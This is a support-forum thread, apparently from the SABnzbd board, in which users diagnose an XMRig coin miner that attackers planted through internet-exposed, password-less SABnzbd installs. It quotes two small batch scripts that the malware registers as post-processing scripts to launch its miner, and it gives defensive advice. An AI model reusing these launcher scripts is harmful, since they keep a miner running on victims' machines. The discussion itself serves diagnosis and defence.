Page 1 of 1

nzbdwin_beta folder: Malware ... coin miner

Posted: April 11th, 2021, 7:45 am
by crispen8
Hi,

Yesterday I got a warning from Bitdefender referencing a program in the nzbdwin_beta folder which appeared in the SABnzbd complete folder.
Is this legit? Or a virus/trojan etc?
The folder gets recreated after I delete it.
I've googled it with no result, and Malwarebytes scan didn't detect any malware/spyware.

Sincerely,
Lowell

Re: nzbdwin_beta folder

Posted: April 11th, 2021, 8:12 am
by safihre
nzbdwin_beta is not something SABnzbd creates.
Or is this maybe the name of one of your folders in Config > Folders?

Re: nzbdwin_beta folder

Posted: April 11th, 2021, 2:27 pm
by crispen8
Was listed in the Config > Folders > Scripts field .
What is the default for this field?
I didn't change this.

Re: nzbdwin_beta folder

Posted: April 13th, 2021, 12:28 am
by safihre
No, it's not default. You can remove it.
Are you really really sure you didn't set that yourself?

Re: nzbdwin_beta folder

Posted: April 13th, 2021, 7:34 am
by imaxst
I noticed this folder the other day after my CPU usage hit 100%. It was running XMRIG miner. I'm not sure where it came from and I did not run any exe files I think it must have exploited a post processing script.

Re: nzbdwin_beta folder

Posted: April 13th, 2021, 7:38 am
by imaxst
From Reddit

So its a Crypto miner, it uses two cron.bat files to have SABNzbd open itself.

@echo off
cd /d %1
start "" "search_indexer.exe" & exit


@echo off
goto start:
########################################
### NZBGET POST-PROCESSING SCRIPT ###
:start
cd /d %NZBPP_DIRECTORY%
start search_indexer.exe
exit /b 93

Re: nzbdwin_beta folder

Posted: April 13th, 2021, 12:58 pm
by safihre
Is your Sabnzbd exposed to the internet without username and password?

Re: nzbdwin_beta folder: Malware ... coin miner

Posted: April 14th, 2021, 10:39 am
by imaxst
Not any longer

Re: nzbdwin_beta folder: Malware ... coin miner

Posted: April 14th, 2021, 2:12 pm
by sander
imaxst wrote: April 14th, 2021, 10:39 am Not any longer
Clever! ;)

Re: nzbdwin_beta folder: Malware ... coin miner

Posted: April 14th, 2021, 2:16 pm
by sander
Oh, everybody: to avoid this in the future:

1) don't have your SAB-webgui unprotected open to Internet: at least put a password on it. Plus: put it on a less well known port, like 49231
2) in SABnzbd, at Unwanted Extensions, fill out EXE, COM, BAT

Re: nzbdwin_beta folder: Malware ... coin miner

Posted: April 14th, 2021, 3:39 pm
by starmanj
I'm getting this malware now.
Now that I'm infected, how do I stop the cron process that is repeatedly running? I added username and password so it stopped downloading the stuff...

Re: nzbdwin_beta folder: Malware ... coin miner

Posted: April 15th, 2021, 5:00 am
by sander
starmanj wrote: April 14th, 2021, 3:39 pm I'm getting this malware now.
Now that I'm infected, how do I stop the cron process that is repeatedly running? I added username and password so it stopped downloading the stuff...
cron process? That sounds Linux, but the malware is Windows (AFAIK) ... so can you explain?